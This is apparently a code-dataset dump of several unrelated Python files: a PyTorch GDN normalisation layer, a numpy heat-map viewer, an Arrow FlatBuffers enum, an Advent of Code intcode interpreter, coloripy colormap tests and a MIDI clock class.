        when ``apply_independently`` is ``True``, otherwise 1.
    gamma : torch.nn.Parameter
        The weights used in the normalising convolution.
    beta : torch.nn.Parameter
        The bias used in the normalising convolution.
    """

    def __init__(self,
                 n_channels: int,
                 kernel_size: int = 1,
                 stride: int = 1,
                 padding: int = 0,
                 gamma_init: float = .1,
                 reparam_offset: float = 2**-18,
                 beta_min: float = 1e-6,
                 apply_independently: bool = False) -> None:
        """
        Constructs a ``GDN`` generalised divisive normalisation class.
        """
        super(GDN, self).__init__()
        # _validate_input raises TypeError on invalid input; it is called
        # directly (not via `assert`) so validation survives `python -O`.
        self._validate_input(n_channels, kernel_size, stride, padding,
                             gamma_init, reparam_offset, beta_min,
                             apply_independently)
        self.stride = stride
        self.padding = padding
        self.reparam_offset = reparam_offset
        self.beta_reparam = (beta_min + self.reparam_offset**2)**0.5
        if apply_independently:
            self.groups = n_channels
        else:
            self.groups = 1

        # Initialise gamma as a reparameterised scaled identity:
        # gamma = gamma_init * I + reparam_offset**2.
        gamma = torch.eye(n_channels, dtype=torch.float)
        gamma = gamma.view(n_channels, n_channels, 1, 1)
        gamma = gamma.repeat(1, 1, kernel_size, kernel_size)
        gamma = torch.sqrt(gamma_init*gamma + self.reparam_offset**2)
        gamma = torch.mul(gamma, gamma)
        if apply_independently:
            # Keep only each channel's own weights, giving a weight tensor
            # of shape [n_channels, 1, k, k] for the grouped convolution.
            gammas = [g[i, :, :] for i, g in enumerate(gamma)]
            gamma = torch.stack(gammas).unsqueeze(1)
        self.gamma = nn.Parameter(gamma)

        beta = torch.ones((n_channels,))
        beta = torch.sqrt(beta + self.reparam_offset**2)
        self.beta = nn.Parameter(beta)

    def _validate_input(self,
                        n_channels: int,
                        kernel_size: int,
                        stride: int,
                        padding: int,
                        gamma_init: float,
                        reparam_offset: float,
                        beta_min: float,
                        apply_independently: bool) -> bool:
        """
        Validates input of the generalised divisive normalisation class.

        For the description of the input parameters and exceptions raised
        by this function, please see the documentation of the
        :class:`expert.layers.divisive_normalisation.GDN` class.

        Returns
        -------
        is_valid
            ``True`` if input is valid; otherwise a TypeError is raised.
        """
        if not isinstance(n_channels, int) or n_channels <= 0:
            raise TypeError('n_channels parameter must be an integer greater '
                            'than 0.')
        if not isinstance(kernel_size, int) or kernel_size <= 0:
            raise TypeError('kernel_size parameter must be an integer greater '
                            'than 0.')
        if not isinstance(stride, int) or stride <= 0:
            raise TypeError('stride parameter must be an integer greater than '
                            '0.')
        if not isinstance(padding, int) or padding < 0:
            raise TypeError('padding parameter must be a positive integer.')
        if not isinstance(gamma_init, float) or gamma_init < 0:
            raise TypeError('gamma_init parameter must be a positive float.')
        if not isinstance(reparam_offset, float) or reparam_offset < 0:
            raise TypeError('reparam_offset parameter must be a positive '
                            'float.')
        if not isinstance(beta_min, float) or beta_min < 0:
            raise TypeError('beta_min parameter must be a positive float.')
        if not isinstance(apply_independently, bool):
            raise TypeError('apply_independently parameter must be a boolean.')
        return True

    def clamp_parameters(self) -> None:
        """
        Clamps the gamma and beta parameters used in the convolution.

        The clamping is performed in place (ignoring gradients) to the
        ``reparam_offset`` and ``beta_reparam`` minimums. Clamping in
        place preserves parameter identity: the previous implementation
        rebound ``self.gamma``/``self.beta`` to brand-new ``nn.Parameter``
        objects on every call, which silently invalidated any optimiser
        already holding references to the old parameters.
        """
        with torch.no_grad():
            self.gamma.clamp_(min=self.reparam_offset)
            self.beta.clamp_(min=self.beta_reparam)

    def forward(self,
                x: torch.Tensor) -> torch.Tensor:
        """
        Forward pass of the layer.

        Parameters
        ----------
        x : torch.Tensor
            The input to the layer. Must be of shape [batch_size, channels,
            height, width] and dtype torch.float32.

        Raises
        ------
        TypeError
            Input parameter ``x`` is not of dtype torch.float.

        Returns
        -------
        output : torch.Tensor
            Output of the generalised divisive normalisation layer.
        """
        if x.dtype != torch.float32:
            raise TypeError('Input x must be of type torch.float32.')
        self.clamp_parameters()
        # norm_pool[i] = sqrt(beta[i] + sum_j gamma[j, i] * x[j]^2)
        norm_pool = F.conv2d(torch.mul(x, x), self.gamma, bias=self.beta,
                             groups=self.groups, stride=self.stride,
                             padding=self.padding)
        norm_pool = torch.sqrt(norm_pool)
        # Resize the pooled norm back to the input's spatial size so the
        # division below is well defined for any stride/padding choice.
        _, _, height, width = x.size()
        image_size = [int(height), int(width)]
        norm_pool = F.interpolate(norm_pool, size=image_size)
        output = x / norm_pool
        return output
| 39.728448 | 79 | 0.605946 |
e6065f668a6e90368fa3e3ff5c24af7760fb1883 | 738 | py | Python | Visualizer.py | jjeong19/evalHeight_gridMap | 506d1253ce62e7b06ed97555ba1d3ec8140a8335 | [
"MIT"
] | null | null | null | Visualizer.py | jjeong19/evalHeight_gridMap | 506d1253ce62e7b06ed97555ba1d3ec8140a8335 | [
"MIT"
] | null | null | null | Visualizer.py | jjeong19/evalHeight_gridMap | 506d1253ce62e7b06ed97555ba1d3ec8140a8335 | [
"MIT"
] | null | null | null | import numpy as np
import argparse
import scipy.linalg
from mpl_toolkits.mplot3d import Axes3D
from skimage.draw import polygon
import matplotlib.pyplot as plt
import glob
from sklearn import datasets, linear_model
import pdb
import time
# Display every third .npy array found in --folder as a heat map.
parser = argparse.ArgumentParser()
parser.add_argument('--folder', default="")
args = parser.parse_args()

# Sort so the arrays are shown in a deterministic (lexicographic) order.
files = sorted(glob.glob(args.folder + "/*.npy"))

# Only every third file is visualised (same sampling as the original
# index-based loop); the unused RMSE accumulator variables were removed.
for npy_path in files[::3]:
    print(npy_path)
    sample = np.load(npy_path)
    plt.figure(figsize=(20, 20))
    plt.imshow(sample, interpolation='none')
    plt.colorbar()
    plt.show(block=False)
    plt.pause(0.2)
    plt.close()
e6067b473594f19a0b7c388916cf26a23f82d960 | 579 | py | Python | thirdparty/org/apache/arrow/flatbuf/VectorType.py | mrocklin/pygdf | 2de9407427da9497ebdf8951a12857be0fab31bb | [
"Apache-2.0"
] | 5 | 2018-10-17T20:28:42.000Z | 2022-02-15T17:33:01.000Z | thirdparty/org/apache/arrow/flatbuf/VectorType.py | mrocklin/pygdf | 2de9407427da9497ebdf8951a12857be0fab31bb | [
"Apache-2.0"
] | 19 | 2018-07-18T07:15:44.000Z | 2021-02-22T17:00:18.000Z | thirdparty/org/apache/arrow/flatbuf/VectorType.py | mrocklin/pygdf | 2de9407427da9497ebdf8951a12857be0fab31bb | [
"Apache-2.0"
] | 2 | 2020-05-01T09:54:34.000Z | 2021-04-17T10:57:07.000Z | # automatically generated by the FlatBuffers compiler, do not modify
# namespace: flatbuf
# /// ----------------------------------------------------------------------
# /// The possible types of a vector
class VectorType(object):
    """Integer constants for the possible buffer ("vector") types, as
    emitted by the FlatBuffers compiler (see the generated-file header).

    The class is only a namespace for the constants below; it is never
    instantiated.
    """
    # /// used in List type, Dense Union and variable length primitive types (String, Binary)
    OFFSET = 0
    # /// actual data, either fixed width primitive types in slots or variable width delimited by an OFFSET vector
    DATA = 1
    # /// Bit vector indicating if each value is null
    VALIDITY = 2
    # /// Type vector used in Union type
    TYPE = 3
| 34.058824 | 110 | 0.621762 |
e606b4f2c79395b331203078985352a2c129c2b0 | 3,231 | py | Python | 05/solution.py | Hegemege/advent-of-code-2019 | 01c2a84fb205069867453f6ba652813a0005fd88 | [
"MIT"
] | null | null | null | 05/solution.py | Hegemege/advent-of-code-2019 | 01c2a84fb205069867453f6ba652813a0005fd88 | [
"MIT"
] | null | null | null | 05/solution.py | Hegemege/advent-of-code-2019 | 01c2a84fb205069867453f6ba652813a0005fd88 | [
"MIT"
] | null | null | null | MAX_INST_PARAM_COUNT = 3
def run_program(memory, input_buffer):
    """Execute the intcode program held in `memory` until it halts.

    `memory` is mutated in place; `input_buffer` supplies the values
    consumed (from the front) by input instructions.
    """
    pc = 0
    while True:
        result_code, pc_offset = execute_instruction(memory, pc, input_buffer)
        if result_code == -1:
            # Halt instruction: the program is finished.
            return
        # result_code 0 advances the program counter; 1 jumps to pc_offset.
        pc = pc + pc_offset if result_code == 0 else pc_offset
def execute_instruction(memory, position, input_buffer):
    """Execute the single instruction located at `position` in `memory`.

    Returns a `(result_code, pc_offset)` tuple:
      * result_code -1: halt (pc_offset is unused),
      * result_code 0: advance the program counter by `pc_offset`,
      * result_code 1: jump the program counter to `pc_offset`.

    Raises:
        ValueError: if the opcode is not recognised. (Previously this case
        only printed a warning and implicitly returned None, which made
        run_program fail later with an opaque unpacking TypeError.)
    """
    instruction_header = memory[position]
    op_code = int(str(instruction_header)[-2:])
    if op_code == 99:  # Halt
        return (-1, 1)

    # Decode parameter modes (least-significant digit first) and pad with
    # zeros (position mode) up to the maximum parameter count.
    parameter_modes_str = str(instruction_header)[:-2][::-1]
    parameter_modes_str = parameter_modes_str.ljust(MAX_INST_PARAM_COUNT, '0')
    parameter_modes = list(map(int, parameter_modes_str))

    # Add (1) and multiply (2)
    if op_code == 1 or op_code == 2:
        operator = int.__add__ if op_code == 1 else int.__mul__
        parameter1 = get_parameter(memory, position, 1, parameter_modes)
        parameter2 = get_parameter(memory, position, 2, parameter_modes)
        write_addr = memory[position + 3]
        memory[write_addr] = operator(parameter1, parameter2)
        return (0, 4)

    # Input (3): pop the next value from the input buffer.
    if op_code == 3:
        write_addr = memory[position + 1]
        input_value = input_buffer.pop(0)
        print("IN".ljust(6, ' ') + str(input_value))
        memory[write_addr] = input_value
        return (0, 2)

    # Output (4)
    if op_code == 4:
        output_value = get_parameter(memory, position, 1, parameter_modes)
        print("OUT".ljust(6, ' ') + str(output_value))
        return (0, 2)

    # Jump-if-true (5) and jump-if-false (6)
    if op_code == 5 or op_code == 6:
        parameter1 = get_parameter(memory, position, 1, parameter_modes)
        parameter2 = get_parameter(memory, position, 2, parameter_modes)
        # Do not jump when the test fails: (p1 == 0) XNOR (op == 5).
        if (parameter1 == 0) == (op_code == 5):
            return (0, 3)
        return (1, parameter2)

    # Less-than (7) and equals (8)
    if op_code == 7 or op_code == 8:
        operator = int.__lt__ if op_code == 7 else int.__eq__
        parameter1 = get_parameter(memory, position, 1, parameter_modes)
        parameter2 = get_parameter(memory, position, 2, parameter_modes)
        write_addr = memory[position + 3]
        memory[write_addr] = 1 if operator(parameter1, parameter2) else 0
        return (0, 4)

    raise ValueError("Opcode not implemented: {}".format(op_code))
def get_parameter(memory, position, offset, parameter_modes):
    """Fetch parameter `offset` of the instruction at `position`.

    Mode 0 (position mode) treats the stored value as an address; any
    other mode (immediate) returns the stored value itself.
    """
    raw_value = memory[position + offset]
    if parameter_modes[offset - 1] == 0:
        return memory[raw_value]
    return raw_value
def part1(part_input):
    """Solve part 1: run the parsed intcode program with input value 1."""
    print("PART 1")
    run_program(parse_input_file(part_input), [1])
def part2(part_input):
    """Solve part 2: run the parsed intcode program with input value 5."""
    print("PART 2")
    run_program(parse_input_file(part_input), [5])
def parse_input_file(input_file_contents):
    """Parse a comma-separated intcode string into a list of integers."""
    return [int(token) for token in input_file_contents.split(",")]
if __name__ == '__main__':
    # The puzzle input is a single comma-separated line in the 'input' file.
    with open('input', 'r') as puzzle_file:
        puzzle_input = puzzle_file.readline()
    part1(puzzle_input)
    part2(puzzle_input)
| 31.368932 | 111 | 0.647478 |
e608539fab23c3cf7080aa7205e16f057ed4a51c | 2,132 | py | Python | test/test_coloripy.py | ajshajib/coloripy | 136bad593b3914a5c33dec069df8bf5a44a5815d | [
"MIT"
] | 3 | 2020-06-14T13:12:33.000Z | 2022-01-03T21:41:16.000Z | test/test_coloripy.py | ajshajib/coloripy | 136bad593b3914a5c33dec069df8bf5a44a5815d | [
"MIT"
] | null | null | null | test/test_coloripy.py | ajshajib/coloripy | 136bad593b3914a5c33dec069df8bf5a44a5815d | [
"MIT"
] | null | null | null | """
Tests for `coloripy` module.
"""
import numpy as np
from math import isclose
import coloripy as cp
class TestColoripy(object):
    """Tests for the `coloripy` module."""

    @classmethod
    def setup_class(cls):
        """No shared fixtures are required."""
        pass

    def test_skew_scale(self):
        """`cp.skew_scale` must leave each tested value unchanged.

        NOTE(review): `zip` truncates to the 3 supplied values, so the
        'power' and 'sqrt' modes are never exercised -- confirm whether
        fixed points should be supplied for those modes as well.
        """
        modes = ['linear', 'square', 'cubic', 'power', 'sqrt']
        vals = [0., 0.5, 1.]
        for mode, val in zip(modes, vals):
            assert isclose(cp.skew_scale(val, mode=mode), val)

    def test_get_cmap(self):
        """`MshColorMap.get_colormap` must reproduce the reference map."""
        standard = np.array([[0.23137255, 0.29803922, 0.75294118],
                             [0.21960784, 0.41568627, 0.87058824],
                             [0.23137255, 0.5372549, 0.97647059],
                             [0.29019608, 0.65490196, 1.0627451],
                             [0.39215686, 0.76862745, 1.12941176],
                             [0.52941176, 0.87843137, 1.18039216],
                             [0.67843137, 0.97647059, 1.20784314],
                             [0.84313725, 1.0627451, 1.21568627],
                             [1.00784314, 1.12941176, 1.21176471],
                             [1.17254902, 1.17647059, 1.19607843],
                             [1.32941176, 1.19607843, 1.17647059],
                             [1.2745098, 1.14901961, 1.03137255],
                             [1.22745098, 1.0745098, 0.87843137],
                             [1.18431373, 0.98431373, 0.7254902],
                             [1.14117647, 0.87843137, 0.58431373],
                             [1.09019608, 0.76078431, 0.45490196],
                             [1.03137255, 0.63137255, 0.34901961],
                             [0.96470588, 0.50196078, 0.26666667],
                             [0.88627451, 0.36862745, 0.20784314],
                             [0.8, 0.22745098, 0.17254902],
                             [0.70588235, 0.01568627, 0.14901961]])
        rgb1 = np.array([59, 76, 192])
        rgb2 = np.array([180, 4, 38])
        ref_point = [221., 221., 221.]
        cmap = cp.MshColorMap(rgb1, rgb2, ref_point=ref_point,
                              num_bins=21).get_colormap()
        # Compare element-wise: the previous signed-sum check let positive
        # and negative per-entry errors cancel, so a wrong colormap could
        # still pass.
        assert np.allclose(cmap, standard)

    @classmethod
    def teardown_class(cls):
        """No cleanup required."""
        pass
| 38.071429 | 66 | 0.486867 |
e609e4bd2d6607c75f66f23c28efe8a4fdb25c1b | 1,080 | py | Python | xxmodularsynth/midi/clock_external.py | xavierxeon-music/MusicTools | 05c74218df18c4ee385895b721c7ad24ea0df552 | [
"MIT"
] | null | null | null | xxmodularsynth/midi/clock_external.py | xavierxeon-music/MusicTools | 05c74218df18c4ee385895b721c7ad24ea0df552 | [
"MIT"
] | null | null | null | xxmodularsynth/midi/clock_external.py | xavierxeon-music/MusicTools | 05c74218df18c4ee385895b721c7ad24ea0df552 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
from rtmidi.midiconstants import SONG_POSITION_POINTER, TIMING_CLOCK, SONG_START, SONG_CONTINUE, SONG_STOP
from .clock_abstract import ClockAbstract
from .midi_input import MidiInput
class ClockExternal(ClockAbstract, MidiInput):
    """MIDI clock driven by messages arriving on an external MIDI input.

    Forwards the incoming realtime messages (timing clock, song position
    pointer, start/continue/stop) to the ``ClockAbstract`` state machine.
    """

    def __init__(self, name=None, port=None):
        # Initialise both bases explicitly; MidiInput opens the port.
        ClockAbstract.__init__(self)
        MidiInput.__init__(self, name, port)
        # python-rtmidi ignores timing messages by default; re-enable them
        # so TIMING_CLOCK events reach _callback.
        self.midiin.ignore_types(timing=False)

    def _callback(self, event, _):
        """Dispatch one incoming MIDI message to the clock state machine."""
        # `event` is a (message, delta_time) pair; the delta time is unused.
        message, _ = event
        midiEvent = message[0]
        if midiEvent == SONG_POSITION_POINTER:
            front = message[1]
            back = message[2]
            # NOTE(review): the MIDI 1.0 spec transmits the 14-bit song
            # position LSB-first, which would make this
            # `1 + front + (128 * back)` -- confirm the sending side uses
            # the byte order (and the +1 offset) assumed here.
            position = 1 + (128 * front) + back
            self._setSongPosition(position)
        elif midiEvent == TIMING_CLOCK:
            self._clockTick()
        elif midiEvent == SONG_START:
            self._setState(ClockAbstract.State.Start)
        elif midiEvent == SONG_CONTINUE:
            self._setState(ClockAbstract.State.Continue)
        elif midiEvent == SONG_STOP:
            self._setState(ClockAbstract.State.Stop)
| 30.857143 | 106 | 0.659259 |